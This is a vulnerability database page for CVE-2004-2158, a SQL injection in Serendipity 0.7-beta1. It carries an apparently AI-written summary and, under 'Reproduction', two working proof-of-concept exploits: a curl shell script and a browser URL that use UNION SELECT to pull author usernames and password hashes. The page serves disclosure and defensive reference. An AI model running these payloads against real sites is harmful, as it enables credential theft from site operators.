CVE-2004-2158
Description
SQL injection in Serendipity 0.7-beta1 allows remote attackers to extract author credentials via entry_id parameter in exit.php and comment.php.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
SQL injection in Serendipity 0.7-beta1 allows remote attackers to extract author credentials via entry_id parameter in exit.php and comment.php.
Vulnerability
Serendipity version 0.7-beta1 is vulnerable to SQL injection. Remote attackers can exploit this by sending specially crafted input to the entry_id parameter in exit.php or comment.php.
Exploitation
An attacker can exploit this vulnerability by sending a malicious request to either exit.php or comment.php with a modified entry_id parameter. For example, they can use a union-based SQL injection to retrieve usernames and MD5 hashes of passwords from the serendipity_authors table [1].
Impact
Successful exploitation allows an attacker to extract sensitive information, specifically usernames and MD5-hashed passwords of authors, from the application's database. This could lead to unauthorized access or further compromise of the system.
Mitigation
There is no specific mitigation or patched version information available in the provided references. Users are advised to upgrade to a non-vulnerable version of Serendipity if available, or to apply any security patches released by the vendor. The vulnerability affects version 0.7-beta1 [1].
AI Insight generated on Jun 3, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Range: = 0.7-beta1
- Range: =0.7-beta1
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The entry_id parameter is not properly sanitized before being used in SQL queries."
Attack vector
Remote attackers can exploit this vulnerability by sending specially crafted requests to the affected scripts. By manipulating the `entry_id` parameter in `exit.php` or `comment.php`, attackers can inject arbitrary SQL commands. The exploit attempts to extract `username` and `password` from the `serendipity_authors` table by using a `UNION SELECT` statement [ref_id=1]. This bypasses intended application logic and allows for data exfiltration.
Affected code
The vulnerability is present in the `exit.php` and `comment.php` scripts of Serendipity version 0.7-beta1. Specifically, the `entry_id` parameter in these scripts is susceptible to SQL injection.
What the fix does
The provided bundle does not contain information about a patch or specific remediation steps. The advisory indicates that the vulnerability exists in version 0.7-beta1 and suggests that updating to a later version would likely resolve the issue. Without a patch diff, the exact fix cannot be detailed.
Preconditions
- inputThe `entry_id` parameter must be controllable by the attacker.
- networkThe attacker must be able to send HTTP requests to the vulnerable web server.
Reproduction
Proof of Concept 1 ------------------
Usage: ./ser_sqli_poc.sh URL_to_Serendipity_Weblog
ser_sqli_poc.sh --------- #!/bin/sh
echo -n "Username: " curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20username%20from%20serendipity_authors%20where%20authorid%3D1" | grep Location | cut -b10- echo -n "MD5(password): " curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20password%20from%20serendipity_authors%20where%20authorid%3D1" | grep Location | cut -b10- ---------
Proof of Concept 2 ------------------
Copy&Paste this to your browser and edit URL_to_Serendipity_Weblog.
http://URL_to_Serendipity_Weblog/comment.php?serendipity[type]=trackbacks&serendipity[entry_id]=0%20and%200%20union%20select%201,2,3,4,username,password,7,8,9,0,1,2,3%20from%20serendipity_authors%20where%20authorid=1%20/*
Generated on Jun 3, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
7- secunia.com/advisories/12673/nvdPatchVendor Advisory
- lists.grok.org.uk/pipermail/full-disclosure/2004-September/026955.htmlnvdExploitVendor Advisory
- securitytracker.com/idnvdExploitPatch
- www.securityfocus.com/bid/11269nvdExploitPatch
- www.osvdb.org/10370nvd
- www.osvdb.org/10371nvd
- exchange.xforce.ibmcloud.com/vulnerabilities/17533nvd
News mentions
0No linked articles in our index yet.